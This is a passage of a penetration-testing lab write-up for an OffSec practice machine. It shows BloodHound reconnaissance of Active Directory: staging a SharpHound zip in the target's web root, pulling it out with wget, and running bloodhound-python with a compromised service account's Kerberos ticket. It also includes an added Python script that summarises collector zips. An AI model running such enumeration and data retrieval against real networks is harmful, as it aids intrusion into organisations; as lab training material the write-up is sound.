BloodHound
BloodHound is a powerful tool used by adversaries to visualize and analyze Active Directory relationships, allowing them to quickly identify and exploit potential attack paths and privilege escalation opportunities within a network. It automates the reconnaissance phase of an attack, helping attackers pinpoint weak points and ultimately compromise Active Directory environments.
Ingestion
PS C:\tmp> cp .\access.offsec_20250421082845_BloodHound.zip C:\xampp\htdocs\uploads\
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ wget -q http://server.access.offsec/uploads/access.offsec_20250421082845_BloodHound.zip
As part of the adPEAS script run, the embedded SharpHound collector was executed on the target; the resulting zip was staged in the web root and retrieved with wget.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ KRB5CCNAME=../svc_mssql@server.access.offsec.ccache bloodhound-python -d ACCESS.OFFSEC -u svc_mssql -k -no-pass --auth-method kerberos -ns $IP -dc server.access.offsec --zip -c Experimental,LoggedOn,All -op python_
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: access.offsec
INFO: Using TGT from cache
INFO: Found TGT with correct principal in ccache file.
INFO: Connecting to LDAP server: server.access.offsec
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: server.access.offsec
INFO: Found 6 users
INFO: Found 52 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: SERVER.access.offsec
INFO: User with SID S-1-5-21-537427935-490066102-1511301751-1103 is logged in on SERVER.access.offsec
INFO: Done in 00M 07S
INFO: Compressing output into 20250421175728_bloodhound.zip
Performing an additional ingestion with bloodhound-python using the TGT of the svc_mssql account
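As an added example (not part of this write-up), a small Python script that inspects a legacy BloodHound 4.x collector zip like the ones produced above and reports what was collected, cross-checking each file's meta.count against its data so a truncated file stands out; the sample zip it builds is constructed inline to mirror the counts in the ingestion log.

```python
"""Summarise a BloodHound legacy (4.x) collector zip.

Added example, not part of the original write-up. SharpHound and
bloodhound-python both emit one JSON file per object type inside the zip,
each shaped {"data": [...], "meta": {"methods", "type", "count", "version"}}.
Useful for triaging a collector zip found in a web upload directory, as on
this host, without needing the BloodHound GUI.
"""
import io
import json
import zipfile


def summarize_bloodhound_zip(zip_bytes: bytes) -> dict:
    """Return {object_type: count} plus lists of inconsistent/skipped members."""
    summary = {"inconsistent": [], "skipped": []}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            try:
                doc = json.loads(zf.read(name))
                objs, meta = doc["data"], doc["meta"]
                kind, claimed = meta["type"], meta["count"]
            except (ValueError, KeyError, TypeError):
                summary["skipped"].append(name)  # not a BloodHound JSON file
                continue
            if claimed != len(objs):  # meta claims more/less than is present
                summary["inconsistent"].append(name)
            summary[kind] = len(objs)
    return summary


def build_sample_zip() -> bytes:
    """Constructed sample mirroring the object counts in the log above."""
    counts = {"domains": 1, "users": 6, "groups": 52, "computers": 1,
              "gpos": 2, "ous": 1, "containers": 19}
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for kind, n in counts.items():
            # Minimal stand-in objects; real files carry ACL and session data.
            data = [{"ObjectIdentifier": f"S-1-5-21-0-0-0-{i}"} for i in range(n)]
            meta = {"methods": 0, "type": kind, "count": n, "version": 5}
            zf.writestr(f"python_{kind}.json", json.dumps({"data": data, "meta": meta}))
        # A truncated member: meta claims 3 trusts but only 1 object survived.
        zf.writestr("python_trusts.json", json.dumps(
            {"data": [{}], "meta": {"methods": 0, "type": "trusts", "count": 3, "version": 5}}))
        zf.writestr("notes.txt", "not json")  # non-JSON member is skipped
    return buf.getvalue()
```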
Prep
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ neo4j_kickstart
[sudo] password for kali:
2025-04-21 15:59:43.578+0000 INFO Starting...
2025-04-21 15:59:44.043+0000 INFO This instance is ServerId{823c0986} (823c0986-8860-45ad-af0e-a0f1316bef16)
2025-04-21 15:59:45.248+0000 INFO ======== Neo4j 4.4.26 ========
2025-04-21 15:59:46.104+0000 INFO Performing postInitialization step for component 'security-users' with version 3 and status CURRENT
2025-04-21 15:59:46.104+0000 INFO Updating the initial password in component 'security-users'
2025-04-21 15:59:46.984+0000 INFO Bolt enabled on localhost:7687.
2025-04-21 15:59:47.902+0000 INFO Remote interface available at http://localhost:7474/
2025-04-21 15:59:47.908+0000 INFO id: F22BE6505A50EE3B6AE80482B39DD2B6A7082E68C916A87DF6F1CD7ECA4DD942
2025-04-21 15:59:47.908+0000 INFO name: system
2025-04-21 15:59:47.908+0000 INFO creationDate: 2024-09-01T10:39:20.089Z
2025-04-21 15:59:47.908+0000 INFO Started.
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/access/bloodhound]
└─$ bloodhound
neo4j & bloodhound
Uploaded ingested domain data
svc_mssql
N/A